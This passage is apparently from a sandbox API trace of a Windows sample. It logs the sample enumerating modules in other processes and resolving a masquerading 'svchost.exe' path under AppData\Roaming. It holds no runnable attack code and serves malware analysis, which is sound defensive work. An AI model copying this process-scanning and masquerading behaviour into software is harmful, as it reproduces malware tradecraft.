lpBaseName="dhcpcsvc6.DLL") returned 0xd [0065.926] CoTaskMemFree (pv=0xd91f20) [0065.926] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.926] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefac20000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")) returned 0x21 [0065.936] CoTaskMemFree (pv=0xd91f20) [0065.936] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefac00000, lpmodinfo=0x241ff10, cb=0x18 | out: lpmodinfo=0x241ff10*(lpBaseOfDll=0x7fefac00000, SizeOfImage=0x18000, EntryPoint=0x7fefac01bf8)) returned 1 [0065.944] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.944] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefac00000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0065.951] CoTaskMemFree (pv=0xd91f20) [0065.952] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.952] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefac00000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")) returned 0x20 [0065.959] CoTaskMemFree (pv=0xd91f20) [0065.959] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9530000, lpmodinfo=0x24220e0, cb=0x18 | out: lpmodinfo=0x24220e0*(lpBaseOfDll=0x7fef9530000, SizeOfImage=0x8000, EntryPoint=0x7fef9531414)) returned 1 [0065.967] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.967] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9530000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0065.975] CoTaskMemFree (pv=0xd91f20) [0065.977] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.977] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9530000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")) returned 0x20 [0065.986] CoTaskMemFree (pv=0xd91f20) [0065.986] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa5d0000, lpmodinfo=0x24242b0, cb=0x18 | out: lpmodinfo=0x24242b0*(lpBaseOfDll=0x7fefa5d0000, SizeOfImage=0xc000, EntryPoint=0x7fefa5d602c)) returned 1 [0065.997] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.997] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa5d0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="npmproxy.dll") returned 0xc [0066.005] CoTaskMemFree (pv=0xd91f20) [0066.005] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.005] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa5d0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")) returned 0x20 [0066.014] CoTaskMemFree (pv=0xd91f20) [0066.014] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef7600000, lpmodinfo=0x2426480, cb=0x18 | out: lpmodinfo=0x2426480*(lpBaseOfDll=0x7fef7600000, SizeOfImage=0xee000, EntryPoint=0x7fef76012a0)) returned 1 [0066.028] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.028] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef7600000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="actxprxy.dll") returned 0xc [0066.036] CoTaskMemFree (pv=0xd91f20) [0066.036] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.036] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef7600000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")) returned 0x20 [0066.044] CoTaskMemFree (pv=0xd91f20) [0066.044] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcb60000, lpmodinfo=0x2428650, cb=0x18 | out: lpmodinfo=0x2428650*(lpBaseOfDll=0x7fefcb60000, SizeOfImage=0x1f000, EntryPoint=0x7fefcb65c68)) returned 1 [0066.052] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.052] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcb60000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="SPINF.dll") returned 0x9 [0066.061] CoTaskMemFree (pv=0xd91f20) [0066.061] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.061] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcb60000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SPINF.dll" (normalized: "c:\\windows\\system32\\spinf.dll")) returned 0x1d [0066.071] CoTaskMemFree (pv=0xd91f20) [0066.071] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb6f0000, lpmodinfo=0x242a810, cb=0x18 | out: lpmodinfo=0x242a810*(lpBaseOfDll=0x7fefb6f0000, SizeOfImage=0x17000, EntryPoint=0x7fefb6f9d50)) returned 1 [0066.079] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.079] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb6f0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="ncprov.dll") returned 0xa [0066.088] CoTaskMemFree (pv=0xd91f20) [0066.088] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.088] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb6f0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\ncprov.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll")) returned 0x23 [0066.098] CoTaskMemFree (pv=0xd91f20) [0066.098] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9520000, lpmodinfo=0x242c9d8, cb=0x18 | out: lpmodinfo=0x242c9d8*(lpBaseOfDll=0x7fef9520000, SizeOfImage=0xf000, EntryPoint=0x7fef9526894)) returned 1 [0066.108] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.108] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9520000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="ndiscapCfg.dll") returned 0xe [0066.118] CoTaskMemFree (pv=0xd91f20) [0066.118] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.118] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9520000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll")) returned 0x22 [0066.138] CoTaskMemFree (pv=0xd91f20) [0066.138] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9500000, lpmodinfo=0x242eba8, cb=0x18 | out: lpmodinfo=0x242eba8*(lpBaseOfDll=0x7fef9500000, SizeOfImage=0x1a000, EntryPoint=0x7fef9511ae4)) returned 1 [0066.148] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.148] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9500000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="rascfg.dll") returned 0xa [0066.158] CoTaskMemFree (pv=0xd91f20) [0066.158] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.158] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9500000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll")) returned 0x1e [0066.167] CoTaskMemFree (pv=0xd91f20) [0066.168] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6590000, lpmodinfo=0x2430d68, cb=0x18 | out: lpmodinfo=0x2430d68*(lpBaseOfDll=0x7fef6590000, SizeOfImage=0x3a000, EntryPoint=0x7fef6591010)) returned 1 [0066.177] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.177] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6590000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="MPRAPI.dll") returned 0xa [0066.190] CoTaskMemFree (pv=0xd91f20) [0066.190] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.190] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6590000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MPRAPI.dll" (normalized: "c:\\windows\\system32\\mprapi.dll")) returned 0x1e [0066.204] CoTaskMemFree (pv=0xd91f20) [0066.204] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6e60000, lpmodinfo=0x2432f28, cb=0x18 | out: lpmodinfo=0x2432f28*(lpBaseOfDll=0x7fef6e60000, SizeOfImage=0x42000, EntryPoint=0x7fef6e90048)) returned 1 [0066.262] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.262] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6e60000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="tcpipcfg.dll") returned 0xc [0066.288] CoTaskMemFree (pv=0xd91f20) [0066.288] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.288] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6e60000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll")) returned 0x20 [0066.296] CoTaskMemFree (pv=0xd91f20) [0066.296] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6520000, lpmodinfo=0x24350f8, cb=0x18 | out: lpmodinfo=0x24350f8*(lpBaseOfDll=0x7fef6520000, SizeOfImage=0x62000, EntryPoint=0x7fef6521198)) returned 1 [0066.305] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.305] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6520000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="RasApi32.dll") returned 0xc [0066.313] CoTaskMemFree (pv=0xd91f20) [0066.313] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.313] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6520000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RasApi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")) returned 0x20 [0066.322] CoTaskMemFree (pv=0xd91f20) [0066.322] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6500000, lpmodinfo=0x2437af8, cb=0x18 | out: lpmodinfo=0x2437af8*(lpBaseOfDll=0x7fef6500000, SizeOfImage=0x1c000, EntryPoint=0x7fef65011a0)) returned 1 [0066.330] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.330] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6500000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="rasman.dll") returned 0xa [0066.343] CoTaskMemFree (pv=0xd91f20) [0066.343] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.343] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6500000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")) returned 0x1e [0066.352] CoTaskMemFree (pv=0xd91f20) [0066.352] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef42f0000, lpmodinfo=0x2439cb8, cb=0x18 | out: lpmodinfo=0x2439cb8*(lpBaseOfDll=0x7fef42f0000, SizeOfImage=0xd2000, EntryPoint=0x7fef4381a10)) returned 1 [0066.361] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.361] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef42f0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="qmgr.dll") returned 0x8 [0066.371] CoTaskMemFree (pv=0xd91f20) [0066.371] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.371] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef42f0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll")) returned 0x1c [0066.380] CoTaskMemFree (pv=0xd91f20) [0066.380] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef42e0000, lpmodinfo=0x243be78, cb=0x18 | out: lpmodinfo=0x243be78*(lpBaseOfDll=0x7fef42e0000, SizeOfImage=0xa000, EntryPoint=0x7fef42e3994)) returned 1 [0066.407] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.407] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef42e0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="bitsperf.dll") returned 0xc [0066.416] CoTaskMemFree (pv=0xd91f20) [0066.416] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.416] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef42e0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll")) returned 0x20 [0066.424] CoTaskMemFree (pv=0xd91f20) [0066.424] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef4250000, lpmodinfo=0x243e048, cb=0x18 | out: lpmodinfo=0x243e048*(lpBaseOfDll=0x7fef4250000, SizeOfImage=0x12000, EntryPoint=0x7fef42590bc)) returned 1 [0066.433] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.433] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef4250000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="bitsigd.dll") returned 0xb [0066.441] CoTaskMemFree (pv=0xd91f20) [0066.442] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.442] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef4250000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll")) returned 0x1f [0066.453] CoTaskMemFree (pv=0xd91f20) [0066.453] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef4200000, lpmodinfo=0x2440208, cb=0x18 | out: lpmodinfo=0x2440208*(lpBaseOfDll=0x7fef4200000, SizeOfImage=0x45000, EntryPoint=0x7fef4233644)) returned 1 [0066.462] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.462] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef4200000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="upnp.dll") returned 0x8 [0066.471] CoTaskMemFree (pv=0xd91f20) [0066.471] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.471] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef4200000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll")) returned 0x1c [0066.481] CoTaskMemFree (pv=0xd91f20) [0066.481] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa240000, lpmodinfo=0x24423c8, cb=0x18 | out: lpmodinfo=0x24423c8*(lpBaseOfDll=0x7fefa240000, SizeOfImage=0x71000, EntryPoint=0x7fefa241010)) returned 1 [0066.489] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.489] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa240000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="WINHTTP.dll") returned 0xb [0066.500] CoTaskMemFree (pv=0xd91f20) [0066.500] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.500] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa240000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINHTTP.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")) returned 0x1f [0066.509] CoTaskMemFree (pv=0xd91f20) [0066.509] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa1d0000, lpmodinfo=0x2444588, cb=0x18 | out: lpmodinfo=0x2444588*(lpBaseOfDll=0x7fefa1d0000, SizeOfImage=0x64000, EntryPoint=0x7fefa1d1254)) returned 1 [0066.517] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.517] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa1d0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="webio.dll") returned 0x9 [0066.526] CoTaskMemFree (pv=0xd91f20) [0066.526] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.526] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa1d0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")) returned 0x1d [0066.536] CoTaskMemFree (pv=0xd91f20) [0066.536] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa190000, lpmodinfo=0x2446748, cb=0x18 | out: lpmodinfo=0x2446748*(lpBaseOfDll=0x7fefa190000, SizeOfImage=0x11000, EntryPoint=0x7fefa199e7c)) returned 1 [0066.564] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.564] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa190000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="SSDPAPI.dll") returned 0xb [0066.574] CoTaskMemFree (pv=0xd91f20) [0066.574] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.574] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa190000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SSDPAPI.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll")) returned 0x1f [0066.583] CoTaskMemFree (pv=0xd91f20) [0066.583] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef32d0000, lpmodinfo=0x2448908, cb=0x18 | out: lpmodinfo=0x2448908*(lpBaseOfDll=0x7fef32d0000, SizeOfImage=0x253000, EntryPoint=0x7fef32d236c)) returned 1 [0066.592] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.592] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef32d0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wuaueng.dll") returned 0xb [0066.683] CoTaskMemFree (pv=0xd91f20) [0066.683] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.683] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef32d0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll")) returned 0x1f [0066.733] CoTaskMemFree (pv=0xd91f20) [0066.733] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef4e80000, lpmodinfo=0x244aac8, cb=0x18 | out: lpmodinfo=0x244aac8*(lpBaseOfDll=0x7fef4e80000, SizeOfImage=0x27a000, EntryPoint=0x7fef4eb2200)) returned 1 [0066.744] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.744] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef4e80000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="ESENT.dll") returned 0x9 [0066.757] CoTaskMemFree (pv=0xd91f20) [0066.757] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.757] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef4e80000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\ESENT.dll" (normalized: "c:\\windows\\system32\\esent.dll")) returned 0x1d [0066.768] CoTaskMemFree (pv=0xd91f20) [0066.768] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb890000, lpmodinfo=0x244cc88, cb=0x18 | out: lpmodinfo=0x244cc88*(lpBaseOfDll=0x7fefb890000, SizeOfImage=0x71000, EntryPoint=0x7fefb8cecc4)) returned 1 [0066.787] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.787] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb890000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="WINSPOOL.DRV") returned 0xc [0066.798] CoTaskMemFree (pv=0xd91f20) [0066.798] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.798] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb890000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\WINSPOOL.DRV" (normalized: "c:\\windows\\system32\\winspool.drv")) returned 0x20 [0066.810] CoTaskMemFree (pv=0xd91f20) [0066.810] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3530000, lpmodinfo=0x244ee58, cb=0x18 | out: lpmodinfo=0x244ee58*(lpBaseOfDll=0x7fef3530000, SizeOfImage=0x1b000, EntryPoint=0x7fef3531198)) returned 1 [0066.824] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.824] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3530000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="Cabinet.dll") returned 0xb [0066.835] CoTaskMemFree (pv=0xd91f20) [0066.835] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.835] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3530000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\Cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")) returned 0x1f [0066.847] CoTaskMemFree (pv=0xd91f20) [0066.847] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef32c0000, lpmodinfo=0x2451018, cb=0x18 | out: lpmodinfo=0x2451018*(lpBaseOfDll=0x7fef32c0000, SizeOfImage=0xf000, EntryPoint=0x7fef32c9a48)) returned 1 [0066.858] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.858] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef32c0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="mspatcha.dll") returned 0xc [0066.891] CoTaskMemFree (pv=0xd91f20) [0066.891] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.891] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef32c0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll")) returned 0x20 [0066.902] CoTaskMemFree (pv=0xd91f20) [0066.902] GetModuleInformation (in: hProcess=0x214, hModule=0x779f0000, lpmodinfo=0x2453200, cb=0x18 | out: lpmodinfo=0x2453200*(lpBaseOfDll=0x779f0000, SizeOfImage=0x7000, EntryPoint=0x779f106c)) returned 1 [0066.914] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.914] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x779f0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0066.925] CoTaskMemFree (pv=0xd91f20) [0066.925] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.925] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x779f0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")) returned 0x1d [0066.937] CoTaskMemFree (pv=0xd91f20) [0066.937] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd1c0000, lpmodinfo=0x24553c0, cb=0x18 | out: lpmodinfo=0x24553c0*(lpBaseOfDll=0x7fefd1c0000, SizeOfImage=0x8000, EntryPoint=0x7fefd1c2a6c)) returned 1 [0066.949] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.949] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd1c0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="WMsgAPI.dll") returned 0xb [0066.962] CoTaskMemFree (pv=0xd91f20) [0066.962] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.962] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd1c0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WMsgAPI.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll")) returned 0x1f [0066.976] CoTaskMemFree (pv=0xd91f20) [0066.976] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef7540000, lpmodinfo=0x2457580, cb=0x18 | out: lpmodinfo=0x2457580*(lpBaseOfDll=0x7fef7540000, SizeOfImage=0x15000, EntryPoint=0x7fef7541020)) returned 1 [0066.988] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0066.988] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef7540000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="appinfo.dll") returned 0xb [0067.002] CoTaskMemFree (pv=0xd91f20) [0067.002] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0067.002] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef7540000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll")) returned 0x1f [0067.017] CoTaskMemFree (pv=0xd91f20) [0067.017] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6d40000, lpmodinfo=0x2459740, cb=0x18 | out: lpmodinfo=0x2459740*(lpBaseOfDll=0x7fef6d40000, SizeOfImage=0x1d000, EntryPoint=0x7fef6d42f18)) returned 1 [0067.039] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0067.039] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6d40000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="mmcss.dll") returned 0x9 [0067.051] CoTaskMemFree (pv=0xd91f20) [0067.051] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0067.051] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6d40000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll")) returned 0x1d [0067.060] CoTaskMemFree (pv=0xd91f20) [0067.060] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb710000, lpmodinfo=0x245b900, cb=0x18 | out: lpmodinfo=0x245b900*(lpBaseOfDll=0x7fefb710000, SizeOfImage=0x9000, EntryPoint=0x7fefb711010)) returned 1 [0067.067] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0067.067] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb710000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="AVRT.dll") returned 0x8 [0067.093] CoTaskMemFree (pv=0xd91f20) [0067.094] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0067.094] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb710000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\AVRT.dll" (normalized: "c:\\windows\\system32\\avrt.dll")) returned 0x1c [0067.102] CoTaskMemFree (pv=0xd91f20) [0067.102] CloseHandle (hObject=0x214) returned 1 [0067.122] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0067.122] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x544) returned 0x214 [0067.123] EnumProcessModules (in: hProcess=0x214, lphModule=0x24610b8, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24610b8, lpcbNeeded=0x23ee40) returned 1 [0067.125] GetModuleInformation (in: hProcess=0x214, hModule=0x13f7d0000, lpmodinfo=0x2461328, cb=0x18 | out: lpmodinfo=0x2461328*(lpBaseOfDll=0x13f7d0000, SizeOfImage=0x6c000, EntryPoint=0x13f80b450)) returned 1 [0067.125] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.125] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x13f7d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wmiprvse.exe") returned 0xc [0067.126] CoTaskMemFree (pv=0xd910e0) [0067.126] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.126] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x13f7d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmiprvse.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")) returned 0x25 [0067.126] CoTaskMemFree (pv=0xd910e0) [0067.126] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x2463538, cb=0x18 | out: lpmodinfo=0x2463538*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, 